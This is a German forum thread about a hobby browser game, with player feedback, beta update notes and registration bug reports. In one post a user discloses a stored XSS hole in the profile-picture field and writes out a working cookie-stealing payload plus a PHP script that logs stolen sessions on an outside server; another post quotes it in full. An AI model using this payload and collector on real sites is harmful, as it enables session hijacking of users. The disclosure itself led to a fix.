Grad ein wenig angetestet, als Verbesserung hätte ich, dass Aktionsmenü ist relativ verwirrend wenn es oben links ist. Würde dieses Eventuell anders platzieren.
NotReallife - Browsergame
04/16/2014 22:19
opfer200000000#46
04/16/2014 22:46
adistoe#47
Hättest du da auch ein Vorschlag wie platzieren?
Oder lieber ganz entfernen?
:)
Oder lieber ganz entfernen?
:)
04/16/2014 22:50
Selfo##48
Hey,
ich finde die Idee echt gut!
Allerdings könntest du vielleicht ein paar Screens auf der Homeseite stellen, dass regt mehr Leute an.
Ansonsten noch viel Glück!
Liebe Grüße,
Selfo
ich finde die Idee echt gut!
Allerdings könntest du vielleicht ein paar Screens auf der Homeseite stellen, dass regt mehr Leute an.
Ansonsten noch viel Glück!
Liebe Grüße,
Selfo
04/16/2014 22:57
adistoe#49
Danke für das Feedback :)
Das mit den Screens ist eigentlich eine gute Idee, werde ich mir mal anschauen :)
Aber dafür müsste vielleicht noch etwas mehr Farbe ins Game kommen, damit die Screens auch was hergeben ;) :D
An den Spassvogel, der sich im Game "hurensohn36" nannte und mir eine PN mit Betreff "hurensohn" und Nachricht "ich ficke dich" geschrieben hat:
Schön, dass du Freude an sowas hast... :cool:
Das mit den Screens ist eigentlich eine gute Idee, werde ich mir mal anschauen :)
Aber dafür müsste vielleicht noch etwas mehr Farbe ins Game kommen, damit die Screens auch was hergeben ;) :D
An den Spassvogel, der sich im Game "hurensohn36" nannte und mir eine PN mit Betreff "hurensohn" und Nachricht "ich ficke dich" geschrieben hat:
Schön, dass du Freude an sowas hast... :cool:
04/19/2014 16:18
adistoe#50
//Update:
19.04.2014 [6.0.0c BETA]
Verschiedene kleinere Bugfixes.
19.04.2014 [6.0.0c BETA]
Verschiedene kleinere Bugfixes.
05/05/2014 22:20
adistoe#51
//Update:
05.05.2014 [6.0.1a BETA]
Teammitglieder ab Supporter werden nun nicht mehr in der Rangliste angezeigt (Nur noch bei Usersuche).
Das Actionmenu wurde rausgepatcht.
Einige Bugfixes.
05.05.2014 [6.0.1a BETA]
Teammitglieder ab Supporter werden nun nicht mehr in der Rangliste angezeigt (Nur noch bei Usersuche).
Das Actionmenu wurde rausgepatcht.
Einige Bugfixes.
05/06/2014 23:06
PaySafeGuy™#52
Ich kann mich nicht mit meiner @gmail.com e-mail anmelden :/
05/07/2014 12:55
adistoe#53
Gibt es eine Fehlermeldung?
Bzw. kommt folgende Meldung: "Bitte geben Sie eine existierende E-Mail-Adresse ein!"
Bzw. kommt folgende Meldung: "Bitte geben Sie eine existierende E-Mail-Adresse ein!"
05/07/2014 20:49
Rainbow'#54
Bei mir funktioniert die Registration leider nicht :/
05/08/2014 19:11
adistoe#55
Welche Fehler werden ausgegeben?
#edit: Habe eben die Registrierung etwas bearbeitet, müsste eig. jetzt funktionieren :D
#edit: Habe eben die Registrierung etwas bearbeitet, müsste eig. jetzt funktionieren :D
05/14/2014 19:30
supercracker13#56
Kleiner hinweis deine Website lässt sich durch XSS leicht angreifen. Also jedenfalls die User der Seite.
Die Schwachstelle ist dort wo man den link für das profilfoto eintragen muss.
Trägt man dort folgendes ein:
Muss man nur ein Script erstellen das folgender maßen aussieht und code.php heißt:
Und schon wird von jedem der die Rangliste aufruft die Session in eine Datei geschrieben die auf einem fremden Server liegt. Kenne mich nicht so gut damit aus, daher kenne ich nur diese Methode.
Ich hoffe du änderst da noch was dran
Die Schwachstelle ist dort wo man den link für das profilfoto eintragen muss.
Trägt man dort folgendes ein:
PHP Code:
"></img><script> var theimg=document.createElement("img"), session=document.cookie, url="http://website.com/code.php?a=" + session; theimg.src=url; document.body.appendChild(theimg); theimg.style.display="none"; </script><img src="
PHP Code:
<?php
$currcode = $_GET["a"];
$daten = $currcode . "\n";
$datei_name = "data.txt";
$fp = fopen($datei_name, "a+");
fwrite($fp, $daten);
fclose($fp);
?>
Ich hoffe du änderst da noch was dran
05/15/2014 01:32
IchVerabschiedeMich#57
Es hätte auch gereicht ihn auf die XSS hinzuweisen :pQuote:
Kleiner hinweis deine Website lässt sich durch XSS leicht angreifen. Also jedenfalls die User der Seite.
Die Schwachstelle ist dort wo man den link für das profilfoto eintragen muss.
Trägt man dort folgendes ein:
Muss man nur ein Script erstellen das folgender maßen aussieht und code.php heißt:PHP Code:"></img><script> var theimg=document.createElement("img"), session=document.cookie, url="http://website.com/code.php?a=" + session; theimg.src=url; document.body.appendChild(theimg); theimg.style.display="none"; </script><img src="
Und schon wird von jedem der die Rangliste aufruft die Session in eine Datei geschrieben die auf einem fremden Server liegt. Kenne mich nicht so gut damit aus, daher kenne ich nur diese Methode.PHP Code:<?php
$currcode = $_GET["a"];
$daten = $currcode . "\n";
$datei_name = "data.txt";
$fp = fopen($datei_name, "a+");
fwrite($fp, $daten);
fclose($fp);
?>
Ich hoffe du änderst da noch was dran
05/15/2014 11:03
supercracker13#58
Ok, sry :DQuote:
Wollte ihm nur zeigen was er möglichst blocken sollte, weil ein paar Sachen waren bereits geblockt
05/15/2014 13:43
IchVerabschiedeMich#59
[Only registered and activated users can see links. Click Here To Register...]Quote:
Wollte ihm nur zeigen was er möglichst blocken sollte, weil ein paar Sachen waren bereits geblockt
Hatte ja auch bereits eine gesamte Auflistung für ihn gemacht :p
Und Privat auch noch paar Sachen gesendet.
05/15/2014 18:49
adistoe#60
Die Usergaben sind grösstenteils gesichert, leider nicht alle, wie es scheint :(
Die Profilbildeingabe habe ich vor geraumer Zeit nach einem XSS mit einer Weiterleitung gesichert, muss ich anscheinend verkackt haben oder bei einem Update versehentlich rausgepatcht haben :)
Danke jedenfalls für den Hinweis :)
Lediglich der Hinweis auf XSS im Profilbild hätte wirklich gereicht, trotzdem danke :)
Und Padrio, durch dich... So viele Fehler gefunden und gefixt :D
#edit:
//Update
15.05.2014 [6.0.1b BETA]
Kleinere Bugfixes
Die Profilbildeingabe habe ich vor geraumer Zeit nach einem XSS mit einer Weiterleitung gesichert, muss ich anscheinend verkackt haben oder bei einem Update versehentlich rausgepatcht haben :)
Danke jedenfalls für den Hinweis :)
Lediglich der Hinweis auf XSS im Profilbild hätte wirklich gereicht, trotzdem danke :)
Und Padrio, durch dich... So viele Fehler gefunden und gefixt :D
#edit:
//Update
15.05.2014 [6.0.1b BETA]
Kleinere Bugfixes